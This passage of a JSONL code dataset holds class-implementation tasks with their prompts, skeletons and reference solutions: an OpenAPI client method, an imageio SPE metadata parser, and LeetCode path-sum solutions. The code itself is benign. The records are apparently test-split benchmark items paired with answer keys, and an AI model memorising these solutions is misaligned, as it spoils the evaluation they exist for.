_preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats)\n\n def public_file_details_with_http_info(self, uuid, **kwargs):\n \"\"\"Copy/paste and workaround the original public_file_details_with_http_info Accepts an application/octet-stream according to the _accept kwarg\"\"\"\n local_var_params = locals()\n all_params = ['uuid']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n all_params.append('_accept')\n for key, val in six.iteritems(local_var_params['kwargs']):\n if key not in all_params:\n raise TypeError(\"Got an unexpected keyword argument '%s' to method app_api_data_file_details\" % key)\n local_var_params[key] = val\n del local_var_params['kwargs']\n if 'uuid' not in local_var_params or local_var_params['uuid'] is None:\n raise ValueError('Missing the required parameter `uuid` when calling `app_api_data_file_details`')\n collection_formats = {}\n path_params = {}\n if 'uuid' in local_var_params:\n path_params['uuid'] = local_var_params['uuid']\n query_params = []\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n header_params['Accept'] = local_var_params.get('_accept', self.api_client.select_header_accept(['application/json', 'application/octet-stream', 
'application/problem+json']))\n auth_settings = ['apiKey', 'bearer']\n return self.api_client.call_api('/data/files/{uuid}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='object', auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats)\n", "source": "the_stack_v2_python_sparse", "source_path": "quetzal/client/base.py", "source_repo": "quetz-al/quetzal-client", "split": "test", "star_events_count": 2} {"blob_id": "7d10070dfcb460bc2f4be5b053b6bf7388e59914", "bodies": ["if comments[4][70:76] != 'COMVER':\n return (-1, -1)\ntry:\n return (int(comments[4][76:78]), int(comments[4][78:80]))\nexcept ValueError:\n return (-1, -1)", "sdt_md = {}\nfor minor in range(version[1] + 1):\n try:\n cmt = __class__.comment_fields[version[0], minor]\n except KeyError:\n continue\n for name, spec in cmt.items():\n try:\n v = spec.cvt(comments[spec.n][spec.slice])\n if spec.scale is not None:\n v *= spec.scale\n sdt_md[name] = v\n except Exception as e:\n warnings.warn(f'Failed to decode SDT-control metadata field `{name}`: {e}')\n sdt_md[name] = None\nif version not in __class__.comment_fields:\n supported_ver = ', '.join(map(lambda x: f'{x[0]}.{x[1]:02}', __class__.comment_fields))\n warnings.warn(f'Unsupported SDT-control metadata version {version[0]}.{version[1]:02}. Only versions {supported_ver} are supported. Some or all SDT-control metadata may be missing.')\ncomment = comments[0] + comments[2]\nsdt_md['comment'] = comment.strip()\nreturn sdt_md", "try:\n month = __class__.months[date[2:5]]\n return datetime(int(date[5:9]), month, int(date[0:2]), int(time[0:2]), int(time[2:4]), int(time[4:6]))\nexcept Exception as e:\n logger.info(f'Failed to decode date from SDT-control metadata: {e}.')", "comver = __class__.get_comment_version(meta['comments'])\nif any((c < 0 for c in comver)):\n logger.debug('SDT-control comments not found.')\n return\nsdt_meta = __class__.parse_comments(meta['comments'], comver)\nmeta.pop('comments')\nmeta.update(sdt_meta)\ndt = __class__.get_datetime(meta['date'], meta['time_local'])\nif dt:\n meta['datetime'] = dt\n meta.pop('date')\n meta.pop('time_local')\nsp4 = meta['spare_4']\ntry:\n meta['modulation_script'] = sp4.decode(char_encoding)\n meta.pop('spare_4')\nexcept UnicodeDecodeError:\n warnings.warn('Failed to decode SDT-control laser modulation script. 
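Both overrides in the record above differ only in their path template and required parameters; the load-bearing piece is letting an explicit `_accept` kwarg win over the generated header negotiation, which otherwise lets the server fall back to application/json. A minimal runnable sketch of that pattern, assuming a stand-in client (`FakeApiClient` and `build_accept_header` are illustrative names, not part of the generated quetzal client):

class FakeApiClient:
    def select_header_accept(self, accepts):
        # Mimics the generated negotiation: joining every acceptable type is
        # what lets the server pick application/json even when octet-stream
        # was wanted -- the bug being worked around.
        return ', '.join(accepts)

def build_accept_header(api_client, **kwargs):
    # An explicit _accept kwarg takes precedence over the negotiated list.
    return kwargs.get('_accept', api_client.select_header_accept(
        ['application/json', 'application/octet-stream', 'application/problem+json']))

client = FakeApiClient()
print(build_accept_header(client))                                      # negotiated list
print(build_accept_header(client, _accept='application/octet-stream'))  # forced binary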
Bad char_encoding?')\nmeta.pop('time_utc')\nmeta.pop('exposure_sec')"], "bodies_text": "<|body_start_0|>\n if comments[4][70:76] != 'COMVER':\n return (-1, -1)\n try:\n return (int(comments[4][76:78]), int(comments[4][78:80]))\n except ValueError:\n return (-1, -1)\n<|end_body_0|>\n\n<|body_start_1|>\n sdt_md = {}\n for minor in range(version[1] + 1):\n try:\n cmt = __class__.comment_fields[version[0], minor]\n except KeyError:\n continue\n for name, spec in cmt.items():\n try:\n v = spec.cvt(comments[spec.n][spec.slice])\n if spec.scale is not None:\n v *= spec.scale\n sdt_md[name] = v\n except Exception as e:\n warnings.warn(f'Failed to decode SDT-control metadata field `{name}`: {e}')\n sdt_md[name] = None\n if version not in __class__.comment_fields:\n supported_ver = ', '.join(map(lambda x: f'{x[0]}.{x[1]:02}', __class__.comment_fields))\n warnings.warn(f'Unsupported SDT-control metadata version {version[0]}.{version[1]:02}. Only versions {supported_ver} are supported. Some or all SDT-control metadata may be missing.')\n comment = comments[0] + comments[2]\n sdt_md['comment'] = comment.strip()\n return sdt_md\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n month = __class__.months[date[2:5]]\n return datetime(int(date[5:9]), month, int(date[0:2]), int(time[0:2]), int(time[2:4]), int(time[4:6]))\n except Exception as e:\n logger.info(f'Failed to decode date from SDT-control metadata: {e}.')\n<|end_body_2|>\n\n<|body_start_3|>\n comver = __class__.get_comment_version(meta['comments'])\n if any((c < 0 for c in comver)):\n logger.debug('SDT-control comments not found.')\n return\n sdt_meta = __class__.parse_comments(meta['comments'], comver)\n meta.pop('comments')\n meta.update(sdt_meta)\n dt = __class__.get_datetime(meta['date'], meta['time_local'])\n if dt:\n meta['datetime'] = dt\n meta.pop('date')\n meta.pop('time_local')\n sp4 = meta['spare_4']\n try:\n meta['modulation_script'] = sp4.decode(char_encoding)\n meta.pop('spare_4')\n except UnicodeDecodeError:\n warnings.warn('Failed to decode SDT-control laser modulation script. Bad char_encoding?')\n meta.pop('time_utc')\n meta.pop('exposure_sec')\n<|end_body_3|>\n", "class_docstring": "Extract metadata written by the SDT-control software Some of it is encoded in the comment strings (see :py:meth:`parse_comments`). Also, date and time are encoded in a peculiar way (see :py:meth:`get_datetime`). Use :py:meth:`extract_metadata` to update the metadata dict.", "class_name": "SDTControlSpec", "detected_licenses": ["BSD-2-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SDTControlSpec:\n \"\"\"Extract metadata written by the SDT-control software Some of it is encoded in the comment strings (see :py:meth:`parse_comments`). Also, date and time are encoded in a peculiar way (see :py:meth:`get_datetime`). Use :py:meth:`extract_metadata` to update the metadata dict.\"\"\"\n\n def get_comment_version(comments: Sequence[str]) -> Tuple[int, int]:\n \"\"\"Get the version of SDT-control metadata encoded in the comments Parameters ---------- comments List of SPE file comments, typically ``metadata[\"comments\"]``. Returns ------- Major and minor version. ``-1, -1`` if detection failed.\"\"\"\n <|body_0|>\n\n def parse_comments(comments: Sequence[str], version: Tuple[int, int]) -> Dict[str, Any]:\n \"\"\"Extract SDT-control metadata from comments Parameters ---------- comments List of SPE file comments, typically ``metadata[\"comments\"]``. 
version Major and minor version of SDT-control metadata format Returns ------- Dict of metadata\"\"\"\n <|body_1|>\n\n def get_datetime(date: str, time: str) -> Union[datetime, None]:\n \"\"\"Turn date and time saved by SDT-control into proper datetime object Parameters ---------- date SPE file date, typically ``metadata[\"date\"]``. time SPE file date, typically ``metadata[\"time_local\"]``. Returns ------- File's datetime if parsing was succsessful, else None.\"\"\"\n <|body_2|>\n\n def extract_metadata(meta: Mapping, char_encoding: str='latin1'):\n \"\"\"Extract SDT-control metadata from SPE metadata SDT-control stores some metadata in comments and other fields. Extract them and remove unused entries. Parameters ---------- meta SPE file metadata. Modified in place. char_encoding Character encoding used to decode strings in the metadata.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if comments[4][70:76] != 'COMVER':\n return (-1, -1)\n try:\n return (int(comments[4][76:78]), int(comments[4][78:80]))\n except ValueError:\n return (-1, -1)\n<|end_body_0|>\n\n<|body_start_1|>\n sdt_md = {}\n for minor in range(version[1] + 1):\n try:\n cmt = __class__.comment_fields[version[0], minor]\n except KeyError:\n continue\n for name, spec in cmt.items():\n try:\n v = spec.cvt(comments[spec.n][spec.slice])\n if spec.scale is not None:\n v *= spec.scale\n sdt_md[name] = v\n except Exception as e:\n warnings.warn(f'Failed to decode SDT-control metadata field `{name}`: {e}')\n sdt_md[name] = None\n if version not in __class__.comment_fields:\n supported_ver = ', '.join(map(lambda x: f'{x[0]}.{x[1]:02}', __class__.comment_fields))\n warnings.warn(f'Unsupported SDT-control metadata version {version[0]}.{version[1]:02}. Only versions {supported_ver} are supported. Some or all SDT-control metadata may be missing.')\n comment = comments[0] + comments[2]\n sdt_md['comment'] = comment.strip()\n return sdt_md\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n month = __class__.months[date[2:5]]\n return datetime(int(date[5:9]), month, int(date[0:2]), int(time[0:2]), int(time[2:4]), int(time[4:6]))\n except Exception as e:\n logger.info(f'Failed to decode date from SDT-control metadata: {e}.')\n<|end_body_2|>\n\n<|body_start_3|>\n comver = __class__.get_comment_version(meta['comments'])\n if any((c < 0 for c in comver)):\n logger.debug('SDT-control comments not found.')\n return\n sdt_meta = __class__.parse_comments(meta['comments'], comver)\n meta.pop('comments')\n meta.update(sdt_meta)\n dt = __class__.get_datetime(meta['date'], meta['time_local'])\n if dt:\n meta['datetime'] = dt\n meta.pop('date')\n meta.pop('time_local')\n sp4 = meta['spare_4']\n try:\n meta['modulation_script'] = sp4.decode(char_encoding)\n meta.pop('spare_4')\n except UnicodeDecodeError:\n warnings.warn('Failed to decode SDT-control laser modulation script. Bad char_encoding?')\n meta.pop('time_utc')\n meta.pop('exposure_sec')\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000211", "length_bytes": 32172, "license_type": "permissive", "methods": [{"docstring": "Get the version of SDT-control metadata encoded in the comments Parameters ---------- comments List of SPE file comments, typically ``metadata[\"comments\"]``. Returns ------- Major and minor version. 
``-1, -1`` if detection failed.", "name": "get_comment_version", "signature": "def get_comment_version(comments: Sequence[str]) -> Tuple[int, int]"}, {"docstring": "Extract SDT-control metadata from comments Parameters ---------- comments List of SPE file comments, typically ``metadata[\"comments\"]``. version Major and minor version of SDT-control metadata format Returns ------- Dict of metadata", "name": "parse_comments", "signature": "def parse_comments(comments: Sequence[str], version: Tuple[int, int]) -> Dict[str, Any]"}, {"docstring": "Turn date and time saved by SDT-control into proper datetime object Parameters ---------- date SPE file date, typically ``metadata[\"date\"]``. time SPE file date, typically ``metadata[\"time_local\"]``. Returns ------- File's datetime if parsing was succsessful, else None.", "name": "get_datetime", "signature": "def get_datetime(date: str, time: str) -> Union[datetime, None]"}, {"docstring": "Extract SDT-control metadata from SPE metadata SDT-control stores some metadata in comments and other fields. Extract them and remove unused entries. Parameters ---------- meta SPE file metadata. Modified in place. char_encoding Character encoding used to decode strings in the metadata.", "name": "extract_metadata", "signature": "def extract_metadata(meta: Mapping, char_encoding: str='latin1')"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_test_000056", "prompt": "Implement the Python class `SDTControlSpec` described below.\n\nClass description:\nExtract metadata written by the SDT-control software Some of it is encoded in the comment strings (see :py:meth:`parse_comments`). Also, date and time are encoded in a peculiar way (see :py:meth:`get_datetime`). Use :py:meth:`extract_metadata` to update the metadata dict.\n\nMethod signatures and docstrings:\n- def get_comment_version(comments: Sequence[str]) -> Tuple[int, int]: Get the version of SDT-control metadata encoded in the comments Parameters ---------- comments List of SPE file comments, typically ``metadata[\"comments\"]``. Returns ------- Major and minor version. ``-1, -1`` if detection failed.\n- def parse_comments(comments: Sequence[str], version: Tuple[int, int]) -> Dict[str, Any]: Extract SDT-control metadata from comments Parameters ---------- comments List of SPE file comments, typically ``metadata[\"comments\"]``. version Major and minor version of SDT-control metadata format Returns ------- Dict of metadata\n- def get_datetime(date: str, time: str) -> Union[datetime, None]: Turn date and time saved by SDT-control into proper datetime object Parameters ---------- date SPE file date, typically ``metadata[\"date\"]``. time SPE file date, typically ``metadata[\"time_local\"]``. Returns ------- File's datetime if parsing was succsessful, else None.\n- def extract_metadata(meta: Mapping, char_encoding: str='latin1'): Extract SDT-control metadata from SPE metadata SDT-control stores some metadata in comments and other fields. Extract them and remove unused entries. Parameters ---------- meta SPE file metadata. Modified in place. char_encoding Character encoding used to decode strings in the metadata.", "prompted_full_text": "Implement the Python class `SDTControlSpec` described below.\n\nClass description:\nExtract metadata written by the SDT-control software Some of it is encoded in the comment strings (see :py:meth:`parse_comments`). Also, date and time are encoded in a peculiar way (see :py:meth:`get_datetime`). 
Use :py:meth:`extract_metadata` to update the metadata dict.\n\nMethod signatures and docstrings:\n- def get_comment_version(comments: Sequence[str]) -> Tuple[int, int]: Get the version of SDT-control metadata encoded in the comments Parameters ---------- comments List of SPE file comments, typically ``metadata[\"comments\"]``. Returns ------- Major and minor version. ``-1, -1`` if detection failed.\n- def parse_comments(comments: Sequence[str], version: Tuple[int, int]) -> Dict[str, Any]: Extract SDT-control metadata from comments Parameters ---------- comments List of SPE file comments, typically ``metadata[\"comments\"]``. version Major and minor version of SDT-control metadata format Returns ------- Dict of metadata\n- def get_datetime(date: str, time: str) -> Union[datetime, None]: Turn date and time saved by SDT-control into proper datetime object Parameters ---------- date SPE file date, typically ``metadata[\"date\"]``. time SPE file date, typically ``metadata[\"time_local\"]``. Returns ------- File's datetime if parsing was succsessful, else None.\n- def extract_metadata(meta: Mapping, char_encoding: str='latin1'): Extract SDT-control metadata from SPE metadata SDT-control stores some metadata in comments and other fields. Extract them and remove unused entries. Parameters ---------- meta SPE file metadata. Modified in place. char_encoding Character encoding used to decode strings in the metadata.\n\n<|skeleton|>\nclass SDTControlSpec:\n \"\"\"Extract metadata written by the SDT-control software Some of it is encoded in the comment strings (see :py:meth:`parse_comments`). Also, date and time are encoded in a peculiar way (see :py:meth:`get_datetime`). Use :py:meth:`extract_metadata` to update the metadata dict.\"\"\"\n\n def get_comment_version(comments: Sequence[str]) -> Tuple[int, int]:\n \"\"\"Get the version of SDT-control metadata encoded in the comments Parameters ---------- comments List of SPE file comments, typically ``metadata[\"comments\"]``. Returns ------- Major and minor version. ``-1, -1`` if detection failed.\"\"\"\n <|body_0|>\n\n def parse_comments(comments: Sequence[str], version: Tuple[int, int]) -> Dict[str, Any]:\n \"\"\"Extract SDT-control metadata from comments Parameters ---------- comments List of SPE file comments, typically ``metadata[\"comments\"]``. version Major and minor version of SDT-control metadata format Returns ------- Dict of metadata\"\"\"\n <|body_1|>\n\n def get_datetime(date: str, time: str) -> Union[datetime, None]:\n \"\"\"Turn date and time saved by SDT-control into proper datetime object Parameters ---------- date SPE file date, typically ``metadata[\"date\"]``. time SPE file date, typically ``metadata[\"time_local\"]``. Returns ------- File's datetime if parsing was succsessful, else None.\"\"\"\n <|body_2|>\n\n def extract_metadata(meta: Mapping, char_encoding: str='latin1'):\n \"\"\"Extract SDT-control metadata from SPE metadata SDT-control stores some metadata in comments and other fields. Extract them and remove unused entries. Parameters ---------- meta SPE file metadata. Modified in place. 
char_encoding Character encoding used to decode strings in the metadata.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if comments[4][70:76] != 'COMVER':\n return (-1, -1)\n try:\n return (int(comments[4][76:78]), int(comments[4][78:80]))\n except ValueError:\n return (-1, -1)\n<|end_body_0|>\n\n<|body_start_1|>\n sdt_md = {}\n for minor in range(version[1] + 1):\n try:\n cmt = __class__.comment_fields[version[0], minor]\n except KeyError:\n continue\n for name, spec in cmt.items():\n try:\n v = spec.cvt(comments[spec.n][spec.slice])\n if spec.scale is not None:\n v *= spec.scale\n sdt_md[name] = v\n except Exception as e:\n warnings.warn(f'Failed to decode SDT-control metadata field `{name}`: {e}')\n sdt_md[name] = None\n if version not in __class__.comment_fields:\n supported_ver = ', '.join(map(lambda x: f'{x[0]}.{x[1]:02}', __class__.comment_fields))\n warnings.warn(f'Unsupported SDT-control metadata version {version[0]}.{version[1]:02}. Only versions {supported_ver} are supported. Some or all SDT-control metadata may be missing.')\n comment = comments[0] + comments[2]\n sdt_md['comment'] = comment.strip()\n return sdt_md\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n month = __class__.months[date[2:5]]\n return datetime(int(date[5:9]), month, int(date[0:2]), int(time[0:2]), int(time[2:4]), int(time[4:6]))\n except Exception as e:\n logger.info(f'Failed to decode date from SDT-control metadata: {e}.')\n<|end_body_2|>\n\n<|body_start_3|>\n comver = __class__.get_comment_version(meta['comments'])\n if any((c < 0 for c in comver)):\n logger.debug('SDT-control comments not found.')\n return\n sdt_meta = __class__.parse_comments(meta['comments'], comver)\n meta.pop('comments')\n meta.update(sdt_meta)\n dt = __class__.get_datetime(meta['date'], meta['time_local'])\n if dt:\n meta['datetime'] = dt\n meta.pop('date')\n meta.pop('time_local')\n sp4 = meta['spare_4']\n try:\n meta['modulation_script'] = sp4.decode(char_encoding)\n meta.pop('spare_4')\n except UnicodeDecodeError:\n warnings.warn('Failed to decode SDT-control laser modulation script. Bad char_encoding?')\n meta.pop('time_utc')\n meta.pop('exposure_sec')\n<|end_body_3|>\n", "revision_id": "a0091371dd42442ca3fae0fc0e8a4f0925757ac7", "skeleton": "<|skeleton|>\nclass SDTControlSpec:\n \"\"\"Extract metadata written by the SDT-control software Some of it is encoded in the comment strings (see :py:meth:`parse_comments`). Also, date and time are encoded in a peculiar way (see :py:meth:`get_datetime`). Use :py:meth:`extract_metadata` to update the metadata dict.\"\"\"\n\n def get_comment_version(comments: Sequence[str]) -> Tuple[int, int]:\n \"\"\"Get the version of SDT-control metadata encoded in the comments Parameters ---------- comments List of SPE file comments, typically ``metadata[\"comments\"]``. Returns ------- Major and minor version. ``-1, -1`` if detection failed.\"\"\"\n <|body_0|>\n\n def parse_comments(comments: Sequence[str], version: Tuple[int, int]) -> Dict[str, Any]:\n \"\"\"Extract SDT-control metadata from comments Parameters ---------- comments List of SPE file comments, typically ``metadata[\"comments\"]``. version Major and minor version of SDT-control metadata format Returns ------- Dict of metadata\"\"\"\n <|body_1|>\n\n def get_datetime(date: str, time: str) -> Union[datetime, None]:\n \"\"\"Turn date and time saved by SDT-control into proper datetime object Parameters ---------- date SPE file date, typically ``metadata[\"date\"]``. time SPE file date, typically ``metadata[\"time_local\"]``. 
Returns ------- File's datetime if parsing was succsessful, else None.\"\"\"\n <|body_2|>\n\n def extract_metadata(meta: Mapping, char_encoding: str='latin1'):\n \"\"\"Extract SDT-control metadata from SPE metadata SDT-control stores some metadata in comments and other fields. Extract them and remove unused entries. Parameters ---------- meta SPE file metadata. Modified in place. char_encoding Character encoding used to decode strings in the metadata.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SDTControlSpec:\n \"\"\"Extract metadata written by the SDT-control software Some of it is encoded in the comment strings (see :py:meth:`parse_comments`). Also, date and time are encoded in a peculiar way (see :py:meth:`get_datetime`). Use :py:meth:`extract_metadata` to update the metadata dict.\"\"\"\n\n def get_comment_version(comments: Sequence[str]) -> Tuple[int, int]:\n \"\"\"Get the version of SDT-control metadata encoded in the comments Parameters ---------- comments List of SPE file comments, typically ``metadata[\"comments\"]``. Returns ------- Major and minor version. ``-1, -1`` if detection failed.\"\"\"\n if comments[4][70:76] != 'COMVER':\n return (-1, -1)\n try:\n return (int(comments[4][76:78]), int(comments[4][78:80]))\n except ValueError:\n return (-1, -1)\n\n def parse_comments(comments: Sequence[str], version: Tuple[int, int]) -> Dict[str, Any]:\n \"\"\"Extract SDT-control metadata from comments Parameters ---------- comments List of SPE file comments, typically ``metadata[\"comments\"]``. version Major and minor version of SDT-control metadata format Returns ------- Dict of metadata\"\"\"\n sdt_md = {}\n for minor in range(version[1] + 1):\n try:\n cmt = __class__.comment_fields[version[0], minor]\n except KeyError:\n continue\n for name, spec in cmt.items():\n try:\n v = spec.cvt(comments[spec.n][spec.slice])\n if spec.scale is not None:\n v *= spec.scale\n sdt_md[name] = v\n except Exception as e:\n warnings.warn(f'Failed to decode SDT-control metadata field `{name}`: {e}')\n sdt_md[name] = None\n if version not in __class__.comment_fields:\n supported_ver = ', '.join(map(lambda x: f'{x[0]}.{x[1]:02}', __class__.comment_fields))\n warnings.warn(f'Unsupported SDT-control metadata version {version[0]}.{version[1]:02}. Only versions {supported_ver} are supported. Some or all SDT-control metadata may be missing.')\n comment = comments[0] + comments[2]\n sdt_md['comment'] = comment.strip()\n return sdt_md\n\n def get_datetime(date: str, time: str) -> Union[datetime, None]:\n \"\"\"Turn date and time saved by SDT-control into proper datetime object Parameters ---------- date SPE file date, typically ``metadata[\"date\"]``. time SPE file date, typically ``metadata[\"time_local\"]``. Returns ------- File's datetime if parsing was succsessful, else None.\"\"\"\n try:\n month = __class__.months[date[2:5]]\n return datetime(int(date[5:9]), month, int(date[0:2]), int(time[0:2]), int(time[2:4]), int(time[4:6]))\n except Exception as e:\n logger.info(f'Failed to decode date from SDT-control metadata: {e}.')\n\n def extract_metadata(meta: Mapping, char_encoding: str='latin1'):\n \"\"\"Extract SDT-control metadata from SPE metadata SDT-control stores some metadata in comments and other fields. Extract them and remove unused entries. Parameters ---------- meta SPE file metadata. Modified in place. 
char_encoding Character encoding used to decode strings in the metadata.\"\"\"\n comver = __class__.get_comment_version(meta['comments'])\n if any((c < 0 for c in comver)):\n logger.debug('SDT-control comments not found.')\n return\n sdt_meta = __class__.parse_comments(meta['comments'], comver)\n meta.pop('comments')\n meta.update(sdt_meta)\n dt = __class__.get_datetime(meta['date'], meta['time_local'])\n if dt:\n meta['datetime'] = dt\n meta.pop('date')\n meta.pop('time_local')\n sp4 = meta['spare_4']\n try:\n meta['modulation_script'] = sp4.decode(char_encoding)\n meta.pop('spare_4')\n except UnicodeDecodeError:\n warnings.warn('Failed to decode SDT-control laser modulation script. Bad char_encoding?')\n meta.pop('time_utc')\n meta.pop('exposure_sec')\n", "source": "the_stack_v2_python_sparse", "source_path": "imageio/plugins/spe.py", "source_repo": "imageio/imageio", "split": "test", "star_events_count": 1332} {"blob_id": "88a8d28ca9bfadf87df1165a5f526f1aaabfcf56", "bodies": ["target = sum\nmemo = {0: 1}\n\ndef dfs(node, cursum):\n if not node:\n return 0\n cursum += node.val\n count = memo.get(cursum - target, 0)\n memo[cursum] = memo.get(cursum, 0) + 1\n sub = dfs(node.left, cursum) + dfs(node.right, cursum)\n memo[cursum] -= 1\n return count + sub\nreturn dfs(root, 0)", "def dfs(node, sumlist):\n if not node:\n return 0\n sumlist = [num + node.val for num in sumlist] + [node.val]\n return sumlist.count(sum) + dfs(node.left, sumlist) + dfs(node.right, sumlist)\nreturn dfs(root, [])"], "bodies_text": "<|body_start_0|>\n target = sum\n memo = {0: 1}\n\n def dfs(node, cursum):\n if not node:\n return 0\n cursum += node.val\n count = memo.get(cursum - target, 0)\n memo[cursum] = memo.get(cursum, 0) + 1\n sub = dfs(node.left, cursum) + dfs(node.right, cursum)\n memo[cursum] -= 1\n return count + sub\n return dfs(root, 0)\n<|end_body_0|>\n\n<|body_start_1|>\n def dfs(node, sumlist):\n if not node:\n return 0\n sumlist = [num + node.val for num in sumlist] + [node.val]\n return sumlist.count(sum) + dfs(node.left, sumlist) + dfs(node.right, sumlist)\n return dfs(root, [])\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def pathSum1(self, root: TreeNode, sum: int) -> int:\n \"\"\"前缀和+记忆优化,参考560题解\"\"\"\n <|body_0|>\n\n def pathSum2(self, root: TreeNode, sum: int) -> int:\n \"\"\"https://leetcode-cn.com/problems/path-sum-iii/solution/437zhi-xu-yi-ci-di-gui-wu-xing-dai-ma-yong-lie-bia/\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n target = sum\n memo = {0: 1}\n\n def dfs(node, cursum):\n if not node:\n return 0\n cursum += node.val\n count = memo.get(cursum - target, 0)\n memo[cursum] = memo.get(cursum, 0) + 1\n sub = dfs(node.left, cursum) + dfs(node.right, cursum)\n memo[cursum] -= 1\n return count + sub\n return dfs(root, 0)\n<|end_body_0|>\n\n<|body_start_1|>\n def dfs(node, sumlist):\n if not node:\n return 0\n sumlist = [num + node.val for num in sumlist] + [node.val]\n return sumlist.count(sum) + dfs(node.left, sumlist) + dfs(node.right, sumlist)\n return dfs(root, [])\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000212", "length_bytes": 1916, "license_type": "no_license", "methods": [{"docstring": "前缀和+记忆优化,参考560题解", "name": "pathSum1", "signature": "def pathSum1(self, root: TreeNode, sum: int) -> int"}, {"docstring": 
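`get_comment_version` in the record above is a fixed-offset parse: the literal `COMVER` must sit at columns 70-76 of the fifth comment string, followed by two two-digit fields for the major and minor version. A self-contained sketch under that assumption (the sample comment below is fabricated; real SPE comments carry other data in the leading columns):

# Fixed-offset parse of an SDT-control COMVER tag, mirroring get_comment_version.
def parse_comver(comment: str):
    # 'COMVER' must sit at columns 70-76; major/minor are two digits each.
    if comment[70:76] != 'COMVER':
        return (-1, -1)
    try:
        return (int(comment[76:78]), int(comment[78:80]))
    except ValueError:
        return (-1, -1)

sample = ' ' * 70 + 'COMVER0503'  # fabricated comment encoding version 5.03
print(parse_comver(sample))       # (5, 3)
print(parse_comver(' ' * 80))     # (-1, -1): tag missing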
"https://leetcode-cn.com/problems/path-sum-iii/solution/437zhi-xu-yi-ci-di-gui-wu-xing-dai-ma-yong-lie-bia/", "name": "pathSum2", "signature": "def pathSum2(self, root: TreeNode, sum: int) -> int"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def pathSum1(self, root: TreeNode, sum: int) -> int: 前缀和+记忆优化,参考560题解\n- def pathSum2(self, root: TreeNode, sum: int) -> int: https://leetcode-cn.com/problems/path-sum-iii/solution/437zhi-xu-yi-ci-di-gui-wu-xing-dai-ma-yong-lie-bia/", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def pathSum1(self, root: TreeNode, sum: int) -> int: 前缀和+记忆优化,参考560题解\n- def pathSum2(self, root: TreeNode, sum: int) -> int: https://leetcode-cn.com/problems/path-sum-iii/solution/437zhi-xu-yi-ci-di-gui-wu-xing-dai-ma-yong-lie-bia/\n\n<|skeleton|>\nclass Solution:\n\n def pathSum1(self, root: TreeNode, sum: int) -> int:\n \"\"\"前缀和+记忆优化,参考560题解\"\"\"\n <|body_0|>\n\n def pathSum2(self, root: TreeNode, sum: int) -> int:\n \"\"\"https://leetcode-cn.com/problems/path-sum-iii/solution/437zhi-xu-yi-ci-di-gui-wu-xing-dai-ma-yong-lie-bia/\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n target = sum\n memo = {0: 1}\n\n def dfs(node, cursum):\n if not node:\n return 0\n cursum += node.val\n count = memo.get(cursum - target, 0)\n memo[cursum] = memo.get(cursum, 0) + 1\n sub = dfs(node.left, cursum) + dfs(node.right, cursum)\n memo[cursum] -= 1\n return count + sub\n return dfs(root, 0)\n<|end_body_0|>\n\n<|body_start_1|>\n def dfs(node, sumlist):\n if not node:\n return 0\n sumlist = [num + node.val for num in sumlist] + [node.val]\n return sumlist.count(sum) + dfs(node.left, sumlist) + dfs(node.right, sumlist)\n return dfs(root, [])\n<|end_body_1|>\n", "revision_id": "2bbb1640589aab34f2bc42489283033cc11fb885", "skeleton": "<|skeleton|>\nclass Solution:\n\n def pathSum1(self, root: TreeNode, sum: int) -> int:\n \"\"\"前缀和+记忆优化,参考560题解\"\"\"\n <|body_0|>\n\n def pathSum2(self, root: TreeNode, sum: int) -> int:\n \"\"\"https://leetcode-cn.com/problems/path-sum-iii/solution/437zhi-xu-yi-ci-di-gui-wu-xing-dai-ma-yong-lie-bia/\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def pathSum1(self, root: TreeNode, sum: int) -> int:\n \"\"\"前缀和+记忆优化,参考560题解\"\"\"\n target = sum\n memo = {0: 1}\n\n def dfs(node, cursum):\n if not node:\n return 0\n cursum += node.val\n count = memo.get(cursum - target, 0)\n memo[cursum] = memo.get(cursum, 0) + 1\n sub = dfs(node.left, cursum) + dfs(node.right, cursum)\n memo[cursum] -= 1\n return count + sub\n return dfs(root, 0)\n\n def pathSum2(self, root: TreeNode, sum: int) -> int:\n \"\"\"https://leetcode-cn.com/problems/path-sum-iii/solution/437zhi-xu-yi-ci-di-gui-wu-xing-dai-ma-yong-lie-bia/\"\"\"\n def dfs(node, sumlist):\n if not node:\n return 0\n sumlist = [num + node.val for num in sumlist] + [node.val]\n return sumlist.count(sum) + dfs(node.left, sumlist) + dfs(node.right, sumlist)\n return dfs(root, [])\n", "source": "the_stack_v2_python_sparse", "source_path": "437_path-sum-iii.py", "source_repo": "helloocc/algorithm", "split": "test", "star_events_count": 1} {"blob_id": 